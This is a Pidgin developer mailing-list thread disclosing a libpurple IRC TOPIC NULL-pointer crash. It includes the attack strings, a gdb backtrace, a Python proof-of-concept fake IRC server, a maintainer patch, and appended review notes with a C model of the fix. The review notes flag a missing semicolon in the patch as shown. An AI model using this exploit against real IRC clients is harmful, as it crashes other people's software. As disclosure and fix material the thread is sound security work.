libpurple IRC TOPIC message Denial of Service
by Cristofaro Mune
Hi,

a vulnerability is present in libpurple released with the current version of Pidgin (2.6.1). It may allow a malicious IRC server to remotely crash libpurple and the overlying application.

Receiving the following message from an IRC server:

    :hostile TOPIC\r\n #room :topic\r\n

causes a segmentation fault because of a NULL ptr dereference, occurring in the for loop at line 467 inside irc_mirc2txt. This happens because both irc_msg_topic in msgs.c and irc_mirc2txt in parse.c do not perform checks for NULL input parameters.

Briefly, the incoming message is processed by read_input in irc.c, where it is changed into

    :hostile TOPIC\0\n #room :topic\r\n

before being parsed by irc_parse_msg. This function identifies irc_msg_topic as the callback function for handling the topic message, and it attempts to build the args array with the needed information (channel and topic description). In doing this it creates a zero filled array (g_new0 at line 691 in parse.c), which fails to be properly populated because of the null byte right after TOPIC. This zero filled array is passed to irc_msg_topic, which passes it straight away to irc_mirc2txt, without performing any check on it. irc_mirc2txt is then called with NULL (stored in args[1]) as argument (line 449 in msgs.c). It will perform a g_strdup on the input (line 466 in parse.c), without checking for NULL. g_strdup returns NULL into the result variable and, again, this value is not checked before being directly used in the following for loop (line 467), leading to the NULL ptr dereference and the segfault.

This behaviour has been successfully reproduced on Pidgin (Windows XP and Ubuntu 9.04) and finch. The following message is also able to trigger the vulnerability:

    :hostile TOPIC #room\r\n :topic\r\n

A backtrace of the crash from a debug enabled finch follows, along with a quickly coded proof of concept, attached for testing purposes. If needed, a slightly more detailed analysis is available on http://www.icysilence.org

Hope this helps.

Best Regards,
Cristofaro Mune

---------------------

//Attack string:
//":hostile TOPIC\r\n #testroom :newtopic\r\n"

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb78416c0 (LWP 10897)]
irc_mirc2txt (string=0x0) at parse.c:467
467             for (i = 0, j = 0; result[i]; i++) {
(gdb) bt
#0  irc_mirc2txt (string=0x0) at parse.c:467
#1  0xb7515515 in irc_msg_topic (irc=0x91a86a0, name=0xb75183fd "topic", from=0x91a9f60 "hostile", args=0x91a7640) at msgs.c:449
#2  0xb7517062 in irc_parse_msg (irc=0x91a86a0, input=0x91a8f90 ":hostile TOPIC") at parse.c:723
#3  0xb7511153 in read_input (irc=0x91a86a0, len=<value optimized out>) at irc.c:625
#4  0x0806a483 in purple_gnt_io_invoke (source=0x914d160, condition=<value optimized out>, data=0x91a7620) at finch.c:169
#5  0xb7c12dad in ?? () from /usr/lib/libglib-2.0.so.0
#6  0xb7bdbb88 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#7  0xb7bdf0eb in ?? () from /usr/lib/libglib-2.0.so.0
#8  0xb7bdf5ba in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#9  0xb8022fd5 in gnt_main () at gntmain.c:516
#10 0x0806a05e in main (argc=1, argv=Cannot access memory at address 0x4
) at finch.c:439

#!/usr/bin/env python
# Proof of concept code for the
# libpurple IRC TOPIC Denial of service vulnerability
# discovered by Cristofaro Mune
#
# Published on 3/09/2009
# Verified on Pidgin (2.6.1)
# Previous versions may be also affected
#
# Usage:
# Create a new IRC account on Pidgin (or other app)
# with:
#     Protocol: IRC
#     Username: whatever
#     Server: 127.0.0.1
#     leave the remaining fields as default
#
# start this PoC with:
#     python libpurple_IRC_TOPC_DOS.py
#
# On Pidgin enable the account and change the state to Available
# Pidgin will connect and crash
#
# (Python 2 syntax: print statement, str sockets.)

from socket import *
from select import select

SOCK_ADDR = '127.0.0.1'
SOCK_PORT = 6667
ANICK = "hostile"

if __name__ == "__main__":
    print 'Starting socket at %s:%d' % (SOCK_ADDR, SOCK_PORT)
    # minimal fake IRC server: one listening socket, one client
    ss = socket (AF_INET, SOCK_STREAM, 0)
    ss.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
    ss.bind ((SOCK_ADDR, SOCK_PORT))
    ss.listen (1)
    print 'Waiting for connection...'
    readfd, writefd, errorfd = select([ss], [ss], [])
    for sk in readfd:
        cs, host = sk.accept()
        #prints USER and NICK
        data = cs.recv(1024)
        print data
        # TOPIC line with the CRLF placed right after the command
        cs.send(":%s %s\r\n %s :%s\r\n" % (ANICK, "TOPIC", "#r00m", "dis-topic"))
    ss.close ()

_______________________________________________
Devel mailing list
Devel@...
http://pidgin.im/cgi-bin/mailman/listinfo/devel
Re: libpurple IRC TOPIC message Denial of Service
by Ethan Blanton-2
Thank you for finding this. Please verify that the attached patch
fixes the problem.

Ethan

--
The laws that forbid the carrying of arms are laws [that have no
remedy for evils]. They disarm only those who are neither inclined
nor determined to commit crimes.
        -- Cesare Beccaria, "On Crimes and Punishments", 1764

-----------------------------------------------------------------
Revision: ad2c6ee53ec9122b25aeb1f918db53be69bdeac3
Ancestor: e831c6c52971a4a144a47c3affa19788d05d58d4
Author: elb@...
Date: 2009-09-03T16:05:01
Branch: im.pidgin.pidgin

Modified files:
        ChangeLog libpurple/protocols/irc/msgs.c

ChangeLog:

Fix parsing of invalid IRC TOPIC messages which contain no actual topic
string. Thanks to Cristofaro Mune for finding this.

============================================================
--- ChangeLog 831e2ebdd0260b68a2c19f6ee47eeec600d43d9c
+++ ChangeLog b79f978b87dd623bd1fee6f93b4279055e57ff12
@@ -6,6 +6,9 @@ version 2.6.2 (??/??/2009):
           to just making the warning non-fatal.
         * Fix using GNOME proxy settings properly. (Erik van Pienbroek)
 
+        IRC:
+        * Fix parsing of invalid TOPIC messages.
+
         MSN:
         * Sending custom smileys in chats is now supported.
         * Ink messages are now saved when using the HTML logger.
============================================================
--- libpurple/protocols/irc/msgs.c 6d17f00388dffe02b6d0699998e5921293fb25cc
+++ libpurple/protocols/irc/msgs.c 7bd2efb6b570875cb82b9745fc3a12dd89a5ddbd
@@ -445,9 +445,13 @@ void irc_msg_topic(struct irc_conn *irc,
         PurpleConversation *convo;
 
         if (!strcmp(name, "topic")) {
+                if (!args[0] || !args[1])
+                        return;
                 chan = args[0];
                 topic = irc_mirc2txt (args[1]);
         } else {
+                if (!args[0] || !args[1] || !args[2])
+                        return
                 chan = args[1];
                 topic = irc_mirc2txt (args[2]);
         }
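Review bot: in the msgs.c hunk, the `return` added in the else branch has no trailing semicolon as shown here, unlike the `return;` added in the "topic" branch; if that is what the patch contains, the statement folds into the following context line as `return chan = args[1];`, which does not compile in a void function, so the second check needs a plain `return;`. Also, this guards only irc_msg_topic: per the report, irc_mirc2txt still calls g_strdup on its input (parse.c line 466) and loops over the result (line 467) without a NULL check, so a NULL guard at the top of irc_mirc2txt (for example `if (!string) return NULL;`) would also protect any other caller that hands it an absent argument. The ChangeLog hunk is fine.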
Re: libpurple IRC TOPIC message Denial of Service
by Cristofaro Mune
Thanks Ethan,

I have tested your patch and it fixes the issue.

Best Regards,
Cristofaro

Ethan Blanton wrote:
> Thank you for finding this. Please verify that the attached patch
> fixes the problem.
>
> Ethan
>
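Added example in C (the language of libpurple), not code from the thread or from Pidgin: it models the receive path the first message describes and the guard Ethan's patch adds, under hypothetical names (parse_message, handle_topic, mirc2txt, process_buffer, the irc_msg_t and topic_result_t types). The buffer is cut at the first CRLF the way read_input does, the argument array is zero-filled the way irc_parse_msg's g_new0 array is, and the handler returns early when a required argument is NULL instead of handing NULL to the formatting stripper; the stripper here also maps NULL to NULL, the defence in depth the original irc_mirc2txt lacked. The "<nick> <channel> :<topic>" shape assumed for the 332 reply in the else branch and the two well-formed sample lines are this example's own constructions; the two malformed lines are the attack strings quoted in the report.

```c
#define _POSIX_C_SOURCE 200809L   /* strdup, strndup */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example with hypothetical names, not libpurple code. The args array is
 * zero-filled (as g_new0() does in irc_parse_msg) and stays NULL when the TOPIC
 * line ends early, so the handler has to check it before use. */
#define MAX_ARGS 4
typedef struct { char *buf; char *name; char *args[MAX_ARGS]; } irc_msg_t;
typedef struct { char chan[64]; char topic[256]; } topic_result_t;

/* Split ":prefix COMMAND arg1 arg2 :trailing"; args missing from the line stay NULL. */
static void parse_message(const char *line, irc_msg_t *msg) {
    char *p, *sp;
    memset(msg, 0, sizeof *msg);                       /* zero-filled like g_new0() */
    p = msg->buf = strdup(line);
    if (*p == ':') { sp = strchr(p, ' '); p = sp ? sp + 1 : p + strlen(p); } /* skip prefix */
    msg->name = p;
    if ((sp = strchr(p, ' '))) *sp = '\0';
    for (char *c = msg->name; *c; c++) *c = (char)tolower((unsigned char)*c); /* "topic" */
    p = sp ? sp + 1 : NULL;
    for (int i = 0; p && *p && i < MAX_ARGS; i++) {
        if (*p == ':') { msg->args[i] = p + 1; break; }   /* trailing argument */
        msg->args[i] = p;
        if ((sp = strchr(p, ' '))) *sp = '\0';
        p = sp ? sp + 1 : NULL;
    }
}

/* Stand-in for irc_mirc2txt(): drop mIRC bold/underline/reverse/reset codes and
 * colour codes (\x03 plus a run of digits/commas). NULL in gives NULL out. */
static char *mirc2txt(const char *s) {
    if (!s) return NULL;                                /* the check 2.6.1 lacked */
    char *out = malloc(strlen(s) + 1), *d = out;
    for (const char *p = s; *p; ) {
        if (*p == '\x03') { for (p++; isdigit((unsigned char)*p) || *p == ','; p++) {} }
        else if (*p == '\x02' || *p == '\x1f' || *p == '\x16' || *p == '\x0f') p++;
        else *d++ = *p++;
    }
    *d = '\0';
    return out;
}

/* Model of irc_msg_topic() with the checks from the patch: 0 = handled, -1 =
 * rejected because a required argument is NULL. Else branch = numeric 332 reply. */
static int handle_topic(const irc_msg_t *msg, topic_result_t *out) {
    const char *chan, *raw;
    if (strcmp(msg->name, "topic") == 0) {
        if (!msg->args[0] || !msg->args[1]) return -1;
        chan = msg->args[0]; raw = msg->args[1];
    } else {
        if (!msg->args[0] || !msg->args[1] || !msg->args[2]) return -1;
        chan = msg->args[1]; raw = msg->args[2];
    }
    char *clean = mirc2txt(raw);
    snprintf(out->chan, sizeof out->chan, "%s", chan);
    snprintf(out->topic, sizeof out->topic, "%s", clean);
    free(clean);
    return 0;
}

/* Whole receive path for one buffer; -2 = not a message this example handles. */
static int process_buffer(const char *raw, topic_result_t *out) {
    /* read_input() model: only the text before the first CRLF reaches the parser,
     * so ":hostile TOPIC\r\n #room :topic\r\n" is parsed as just ":hostile TOPIC". */
    const char *end = strstr(raw, "\r\n");
    char *line = strndup(raw, end ? (size_t)(end - raw) : strlen(raw));
    irc_msg_t msg;
    parse_message(line, &msg);
    int rc = -2;
    if (!strcmp(msg.name, "topic") || !strcmp(msg.name, "332")) rc = handle_topic(&msg, out);
    free(msg.buf);
    free(line);
    return rc;
}

/* The two attack strings quoted in the report, plus two constructed valid lines. */
static const char ATTACK_AFTER_COMMAND[] = ":hostile TOPIC\r\n #room :topic\r\n";
static const char ATTACK_AFTER_CHANNEL[] = ":hostile TOPIC #room\r\n :topic\r\n";
static const char GOOD_TOPIC[] = ":hostile TOPIC #room :\x03" "04,01new\x02 topic\x0f\r\n";
static const char GOOD_332[] = ":irc.example 332 me #room :hello\r\n";

int main(void) {
    const char *samples[] = { ATTACK_AFTER_COMMAND, ATTACK_AFTER_CHANNEL, GOOD_TOPIC, GOOD_332 };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        topic_result_t r = { "", "" };
        int rc = process_buffer(samples[i], &r);
        if (rc == 0) printf("accepted: chan=%s topic=\"%s\"\n", r.chan, r.topic);
        else printf("rejected (rc=%d): a required TOPIC argument is NULL\n", rc);
    }
    return 0;
}
```

Running it prints one accepted or rejected line per sample: the two malformed lines are turned away inside handle_topic before anything dereferences the empty slots, while the well-formed TOPIC and 332 lines come out with their channel and a topic stripped of mIRC formatting. The early return mirrors the patch; the NULL check in mirc2txt is the extra layer that would have made the original irc_mirc2txt safe on its own.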